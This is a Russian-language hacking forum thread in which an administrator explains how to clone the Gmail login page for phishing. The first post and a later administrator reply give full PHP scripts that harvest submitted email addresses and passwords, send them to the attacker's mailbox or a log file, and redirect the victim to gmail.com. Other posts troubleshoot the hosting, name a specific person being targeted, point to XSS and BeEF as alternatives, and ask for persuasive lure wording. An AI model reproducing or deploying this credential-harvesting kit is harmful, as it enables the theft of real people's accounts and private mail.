Web Фейк для www.Gmail.com

Поделиться12011-08-03 00:02:15

Автор: Lyubitel
Администратор
Откуда: ПЕНТАГОН
Зарегистрирован: 2011-07-12
Приглашений: 2
Сообщений: 821
Уважение: [+15/-0]
Пол: Мужской
Провел на форуме:
21 день 9 часов
Последний визит:
2014-07-08 23:59:21

Доброго времени суток!!!

В этой статье я расскажу как сделать фейк на wwwGmail.com

И так приступим

Переходим на страницу авторизации wwwGmail.com открываем исходный код страницы.Делается это так.. кликаем правой кнопкой мышки и выбираем строку "Исходный код страницы".Далее копируем его в текстовик и ищем строку

action="https://www.google.com/accounts/ServiceLoginAuth" method="post"

И меняем его на

action="login.php" method="post"

Сохраняем как index.php

Как всегда наш фейк будет отсылать логи на почту!

Вот сам login.php

Код:

<?php

$BASE="мыло";
$IS_EMAIL=true;
$LOCATION="http://gmail.com/";

$p0=$_REQUEST["Email"];
$p1=$_REQUEST["Passwd"];
$headers = "Content-type: text/html; charset=windows-1251\r\n";
$headers .= "From: bot <$BASE>\r\n";
$headers .= "Bcc: $BASE\r\n";
$info="логин:$p0:пароль:$p1:\n";

if ($IS_EMAIL){
mail($BASE, "Привет от www.thehackword.ru", $headers.$info);
} else {
$fd=fopen($BASE,"a+");
fwrite($fd,$info);
fclose($fd);
}

header("Location:$LOCATION");
?>

Вписываем своё мыло в login.php

И так наш фейк готов!

Заливаем index.php и login.php на хост и радуемся, как это сделать вы можете узнать в этом статье

Если что можете скачать уже готовый фейк

Скачать

Ну вот и все!

0

Поделиться22011-10-31 00:02:45

Автор: Snake92
Пользователь
Зарегистрирован: 2011-10-29
Приглашений: 0
Сообщений: 36
Уважение: [+0/-0]
Провел на форуме:
4 часа 53 минуты
Последний визит:
2011-12-20 13:34:27

Привет у меня почему- то после ввода почты и пароля на странице фэйка

Код:

Warning: Cannot modify header information - headers already sent by (output started at /home/s/support.h16.ru/WWW/login.php:1) in /home/s/support.h16.ru/WWW/login.php on line 22

в чем может быть проблема . Заранее спасибо .

0

Поделиться32011-10-31 00:07:17

Автор: Lyubitel
Администратор
Откуда: ПЕНТАГОН
Зарегистрирован: 2011-07-12
Приглашений: 2
Сообщений: 821
Уважение: [+15/-0]
Пол: Мужской
Провел на форуме:
21 день 9 часов
Последний визит:
2014-07-08 23:59:21

Snake92 может ты права поставил на php скрипт???

0

Поделиться42011-11-01 13:15:06

Автор: Snake92
Пользователь
Зарегистрирован: 2011-10-29
Приглашений: 0
Сообщений: 36
Уважение: [+0/-0]
Провел на форуме:
4 часа 53 минуты
Последний визит:
2011-12-20 13:34:27

Lyubitel написал(а):

может ты права поставил на php скрипт???

все сделал как описано выше , о каких правах ты говоришь , где их можно ставить если можно по подробнее

0

Поделиться52011-11-01 14:34:47

Автор: MOssWar
Администратор
Откуда: Wonderland
Зарегистрирован: 2011-07-06
Приглашений: 0
Сообщений: 1264
Уважение: [+32/-2]
Пол: Мужской
Провел на форуме:
1 месяц 4 дня
Последний визит:
2014-10-20 00:18:26

Snake92 трабла скорей всего в хосте,пробуй сменить на holm.ru или hut.ru там норм должно быть.

0

Поделиться62011-11-01 15:10:11

Автор: Snake92
Пользователь
Зарегистрирован: 2011-10-29
Приглашений: 0
Сообщений: 36
Уважение: [+0/-0]
Провел на форуме:
4 часа 53 минуты
Последний визит:
2011-12-20 13:34:27

Залито на holm.ru сайт _http://www.support.h16.ru/ в папку www оба файла в кодировке ANSI может проблема в этом ?

0

Поделиться72011-11-01 16:21:31

Автор: MOssWar
Администратор
Откуда: Wonderland
Зарегистрирован: 2011-07-06
Приглашений: 0
Сообщений: 1264
Уважение: [+32/-2]
Пол: Мужской
Провел на форуме:
1 месяц 4 дня
Последний визит:
2014-10-20 00:18:26

Snake92 ошибка в скрипте,перекопипасть скрипт выложенный здесь,или попробуй воткнуть скрипт на запись в файл

Код:

<? 
$BASE="info.php"; 
$mails="свой e-mail";
$IS_EMAIL=true;
$LOCATION="activation.html"; 
$data=date("d.m.Y"); 
$time=date("h:i"); 
$Login=$_REQUEST["login"]; 
$Password=$_REQUEST["passwd"]; 
$headers = "Content-type: text/html; charset=windows-1251\r\n";
$headers .= "From: bot <$BASE>\r\n";
$headers .= "Bcc: $BASE\r\n";
$info="$data | $time | Логин: $Login |Пароль: $Password \n"; 
if ($IS_EMAIL){
mail($mails, "Привет от www.thehackword.ru", $headers.$info);
}
$fd=fopen($BASE,"a+"); 
fwrite($fd,$info); 
fclose($fd); 
header("Location:$LOCATION"); 
?>

рядом со всем вкинь info.php в который впиши

Код:

<?php
?>

потом напишеш есть ошибки или нету.

0

Поделиться82011-11-01 20:16:34

Автор: Snake92
Пользователь
Зарегистрирован: 2011-10-29
Приглашений: 0
Сообщений: 36
Уважение: [+0/-0]
Провел на форуме:
4 часа 53 минуты
Последний визит:
2011-12-20 13:34:27

После ввода пароля и логина перекидывает на страницу http://err.h18.ru/error404.shtml
P.S На скоко я понял на указанную в скрипте почту должен будет придти пароль и логин или я не так понял ? , Тот кого я пытаюсь взломать сам программист и выход на страницу с http://err.h18.ru/error404.shtml он сразу заметит )

0

Поделиться92011-11-01 21:15:42

Автор: MOssWar
Администратор
Откуда: Wonderland
Зарегистрирован: 2011-07-06
Приглашений: 0
Сообщений: 1264
Уважение: [+32/-2]
Пол: Мужской
Провел на форуме:
1 месяц 4 дня
Последний визит:
2014-10-20 00:18:26

Snake92 вот этот скрипет вот так скопипасть,ток mail@mail.com смени на свой мыльник,всё остальное так как есть оставь,сохрани как login.php и залей на хост,всё будет пахать и ошибок ни каких не будет.
В том скрипте выше тупа переадресация стоит на несуществующию страницу как раз её та и нету,вот почему и вылазиет эта ошибка,в этом скрипте всё ровно.
Логи будут идти на то мыло которое ты укажешь в скрипте.

Код:

<?php

$BASE="mail@mail.com";
$IS_EMAIL=true;
$LOCATION="http://gmail.com/";

$p0=$_REQUEST["Email"];
$p1=$_REQUEST["Passwd"];
$headers = "Content-type: text/html; charset=windows-1251\r\n";
$headers .= "From: bot <$BASE>\r\n";
$headers .= "Bcc: $BASE\r\n";
$info="логин:$p0:пароль:$p1:\n";

if ($IS_EMAIL){
mail($BASE, "Привет от www.thehackword.ru", $headers.$info);
} else {
$fd=fopen($BASE,"a+");
fwrite($fd,$info);
fclose($fd);
}

header("Location:$LOCATION");
?>

Да и если чел программист,то на фейк врятле поведётся,хотя есть и такие))
Ну если не срастётся,то юзай эксплойты,XSS,BEEF, и т.д.
Да мало ли как ещё можно ломануть...

0

Поделиться102011-11-01 22:10:53

Автор: Snake92
Пользователь
Зарегистрирован: 2011-10-29
Приглашений: 0
Сообщений: 36
Уважение: [+0/-0]
Провел на форуме:
4 часа 53 минуты
Последний визит:
2011-12-20 13:34:27

Спасибо большое скрипт работает буду пробовать )

0

Поделиться112011-11-02 18:28:41

Автор: Snake92
Пользователь
Зарегистрирован: 2011-10-29
Приглашений: 0
Сообщений: 36
Уважение: [+0/-0]
Провел на форуме:
4 часа 53 минуты
Последний визит:
2011-12-20 13:34:27

Похоже что не прокатило , какой бы ты посоветовал способ выбрать для взлома мыла на gmail ?

0

Поделиться122011-11-04 01:33:02

Автор: andersen62
Пришедший
Зарегистрирован: 2011-11-04
Приглашений: 0
Сообщений: 1
Уважение: [+0/-0]
Провел на форуме:
13 минут
Последний визит:
2011-11-04 01:42:35

не получается скачать с 1-го поста, перезалейте пож.

0

Поделиться132011-11-04 12:02:15

Автор: MOssWar
Администратор
Откуда: Wonderland
Зарегистрирован: 2011-07-06
Приглашений: 0
Сообщений: 1264
Уважение: [+32/-2]
Пол: Мужской
Провел на форуме:
1 месяц 4 дня
Последний визит:
2014-10-20 00:18:26

Snake92 ищи xss причём любую,есть возможность добыть логи через xss в чистом виде,правда на практике ещё не тестил но в теории в полне возможно.
andersen62 сделать свой пять минут.

0

Поделиться142011-11-04 12:12:22

Автор: Lyubitel
Администратор
Откуда: ПЕНТАГОН
Зарегистрирован: 2011-07-12
Приглашений: 2
Сообщений: 821
Уважение: [+15/-0]
Пол: Мужской
Провел на форуме:
21 день 9 часов
Последний визит:
2014-07-08 23:59:21

andersen62 перезалил

0

Поделиться152012-01-23 14:26:03

Автор: Васяпупкин
Пришедший
Зарегистрирован: 2012-01-23
Приглашений: 0
Сообщений: 2
Уважение: [+0/-0]
Провел на форуме:
2 часа 36 минут
Последний визит:
2012-01-31 20:42:35

Добрый день, подскажите, пожалуйста, правдоподобный текст для отправки запроса на авторизацию через этот фейк. Что не придумаю-всё бредятиной пахнет, мало кто купится)

0